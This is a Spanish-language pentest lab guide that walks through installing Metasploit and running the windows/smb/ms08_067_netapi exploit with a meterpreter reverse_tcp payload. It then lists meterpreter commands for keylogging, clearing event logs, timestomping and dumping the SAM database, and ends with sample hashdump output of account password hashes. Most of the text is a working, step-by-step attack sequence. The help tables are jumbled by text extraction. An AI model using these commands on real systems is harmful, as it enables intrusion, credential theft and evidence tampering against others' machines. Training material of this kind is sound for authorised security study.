Pasos previos a la instalacin en Ubuntu : http://www.metasploit.

com/redmine/projects/framework/wiki/Install_Ubuntu Descargar y Desempaquetar

Verifique que el paquete ruby se encuentre instalado en la mquina. Descargar el paquete de MestaSploit desde la direccin siguiente: http://www.metasploit.com/framework/download Descargar la versin 3.X Una vez descargada, se deber desempaquetar e ingresar al directorio

msf

Para este ejercicio, ingresar al directorio /pentest/exploits/framework3 y actualizar el framework digitando : svn update

MODO CONSOLA
Deber de ejecutarla en modo consola : ./msfconsole

Utilizar los comandos siguientes para conocer el paquete: msf > show exploits Objetivo: MS Windows

La actividad a realizar es con el exploit: windows/smb/ms08_067_netapi. Para ello debe ejecutar los comandos siguientes:

./msfconsole msf > show exploits msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set rhost direccion_IP_victima msf exploit(ms08_067_netapi) > show payloads Una vez que se muestren los PAYLOADs, seleccionar el payload meterpreter msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp Luego seleccionar al atacante: msf exploit(ms08_067_netapi) > set lhost direccion_IP_atacante Para ver que todos los valores fueron puestos correctamente: msf exploit(ms08_067_netapi) > set Por ltimo, ejecutar el exploit: msf exploit(ms08_067_netapi) > exploit

METERPRETER
meterpreter > help

Core Commands =============

Command ------?

Description -----------

Help menu Backgrounds the current session Displays information about active channels Closes a channel Terminate the meterpreter session Help menu Interacts with a channel Drop into irb scripting mode Migrate the server to another process Terminate the meterpreter session Reads data from a channel Executes a meterpreter script Load a one or more meterpreter extensions Writes data to a channel

background channel close exit help interact irb migrate quit read run use write

Stdapi: File system Commands ============================

Command ------cat

Description ----------Read the contents of a file to the screen

cd del download edit getlwd getwd lcd lpwd ls mkdir pwd rm rmdir upload

Change directory Delete the specified file Download a file or directory Edit a file Print local working directory Print working directory Change local working directory Print local working directory List files Make directory Print working directory Delete the specified file Remove directory Upload a file or directory

Stdapi: Networking Commands ===========================

Command ------ipconfig portfwd route

Description ----------Display interfaces Forward a local port to a remote service View and modify the routing table

Stdapi: System Commands =======================

Command

Description

------clearev execute getpid getuid kill ps reboot reg rev2self shell shutdown sysinfo

----------Clear the event log Execute a command Get the current process identifier Get the user that the server is running as Terminate a process List running processes Reboots the remote computer Modify and interact with the remote registry Calls RevertToSelf() on the remote machine Drop into a system command shell Shuts down the remote computer Gets information about the remote system, such as OS

Stdapi: User interface Commands ===============================

Command -------

Description -----------

enumdesktops List all accessible desktops and window stations idletime Returns the number of seconds the remote user has been idle

keyscan_dump Dump they keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes setdesktop uictl Move to a different workstation and desktop Control some of the user interface components

Priv: Password database Commands ================================

Command ------hashdump

Description ----------Dumps the contents of the SAM database

Priv: Timestomp Commands ========================

Command -------

Description ----------Manipulate file MACE attributes

timestomp EJEMPLO :

meterpreter > hashdump

Administrador:500:fd339fb80b44d34564c3113b4a1a5e3a0:14348077370769d30e68ce81549849c0::: Asistente de ayudaM:1000:9a379af252bf73ee05617bba465241fb:b2c7cce470a5f7f5422984b8cf3d5292::: Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0?:1002:aad3b435b51404eeaad3b435b51404ee:6e88c8b50b58f1981cec8b033c631ef4:::